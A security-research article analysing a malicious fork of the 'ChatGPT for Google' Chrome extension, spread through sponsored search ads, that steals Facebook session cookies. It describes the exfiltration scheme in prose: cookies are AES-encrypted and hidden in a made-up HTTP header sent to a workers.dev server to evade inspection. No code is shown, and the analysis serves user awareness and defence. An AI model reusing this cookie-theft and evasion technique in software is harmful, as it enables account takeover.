Few hours after Guardio’s report to Google, the extension is now removed from the Chrome store. At the time of removal, it was stated 9000+ users installed it.
The new variant of the FakeGPT Chrome extension, titled “Chat GPT For Google”, is once again targeting your Facebook accounts under a cover of a ChatGPT integration for your Browser. This time, threat actors didn’t have to work hard on the look and feel of this malicious ChatGPT-themed extension — they just forked and edited a well-known open-source project that does exactly that. From zero to “hero” in probably less than 2 minutes.
Left: The “FakeGPT” Variant on Chrome Store. Right: The genuine “ChatGPT for Google” extension
The genuine “ChatGPT For Google” extension is based on this Open-Source project, which gained popularity and millions of users in the past few months. As an open-source project, it is meant to share knowledge and contribute to the developers’ community — little did they know it will be abused so easily for malicious activity.
This time, the malicious extension is not pushed using sponsored Facebook posts, but rather by malicious sponsored Google search results as we’ve seen with many other activities lately.
And so, you search for “Chat GPT 4”, eager to test out the new algorithm, ending up clicking on a sponsored search result promising you just that. This redirects you to a landing page offering you ChatGPT right inside your search results page — all left is to install the extension from the official Chrome Store. This will give you access to ChatGPT from the search results, But will also compromise your Facebook account in an instant!
Attack flow from Google Search to Compromised Facebook accounts
Based on version 1.16.6 of the open-source project, this FakeGPT variant does only one specific malicious action, right after installation, and the rest is basically the same as the genuine code — leaving no reasons to suspect.
The genuine ChatGPT for Google Open-Source Project page on GitHub
Looking at the OnInstalled handler function that is triggered once the extension is installed, we see the genuine extension just using it to make sure you see the options screen (to log in to your OpenAI account). On the other hand, the forked, turned malicious, code is exploiting this exact moment to snatch your session cookies — as we can see in this deobfuscated code sample from the malicious extension
What we see here is straightforward Cookie-Hijacking, dedicated once again to Facebook, as can be seen in the following code snippet where the function et() is filtering Facebook-related cookies from the full list acquired with the Chrome Extension API. Later on, xa()is used to encrypt everything with AES using the key “chatgpt4google”:
Once the list is ready, it is sent out with a GET request to the C2 server hosted on the workers.dev service, the same service as we’ve seen on the original variant of FakeGPT.
The cookies list is encrypted with AES and attached to the X-Cached-Key HTTP header value. This technique is used here to try and sneak the cookies out without any DPI (Deep Packet Inspection) mechanisms raising alerts on the packet payload (which is why it is encrypted as well).
Only note that there is no X-Cached-Key Header in the HTTP protocol! There is aX-Cache-Key header (without the ‘d’) used for responses, not requests. But this doesn’t bother the scammers that get exactly what they needed from compromised browsers:
Decrypting the Header value will give us this easy-to-read list of all current Facebook session cookies active on the browser, looking something like this (reduced list):
To the above request, the C2 server responds with a generic 404 error and that’s it — “All Your Facebook are belong to us!”
For threat actors, the possibilities are endless — using your profile as a bot for comments, likes, and other promotional activities, or creating pages and advertisement accounts using your reputation and identity while promoting services that are both legitimate and probably mostly not.
With those cookies, your Facebook session can be quickly overtaken, your basic account login details changed, and from this point further you lose control over your profile with no way to regain it. This will be followed by automatically changing the profile name and picture — probably to yet another fake “Lilly Collins” (which seems to be their favorite) and of course, your private data harvested (for more profit) and cleared for good to make room for maliciousness.
We’ve seen so many user profiles falling for this lately, many being later abused for pushing more malicious activity inside the Facebook eco-system and even plain and simple propaganda of the worst kind.
One quite brutal example to visualize it all is this RV-selling business page hijacked on the 4th of March 2023. Still available on the original URL https://www[.]facebook[.]com/shadymaplefarmmarket and is now used to promote ISIS Content. See how Lily Collins is automatically added as the profile picture immediately after being hijacked (probably by an automated system used by scammers). This is later updated to ISIS-themed pictures, possibly following it being sold out to another actor looking to propagate this kind of content using high-profile stolen Facebook accounts:
Example of a Hijacked Facebook Business Page used to promote ISIS Content
The misuse of ChatGPT’s brand and popularity just keeps on rising, used not only for Facebook account harvesting and not only with malicious fake Extensions for Chrome. Major services offered by Facebook, Google, and other big names are under continuous attack and abuse, while at the end of it all — the ones being mostly hit here are us, the users.
Awareness is a crucial factor in dodging those attacks and keeping your data private, yet these days it’s more and more obvious that even for home/casual internet users there must be some sort of security protection and detection services that are more relevant and focused for their needs — overcoming those huge security gaps hitting users in masses.
Read more about the “FakeGPT” Campaign:
This article was published in collaboration with Guardio Labs.
Image source: unsplash.com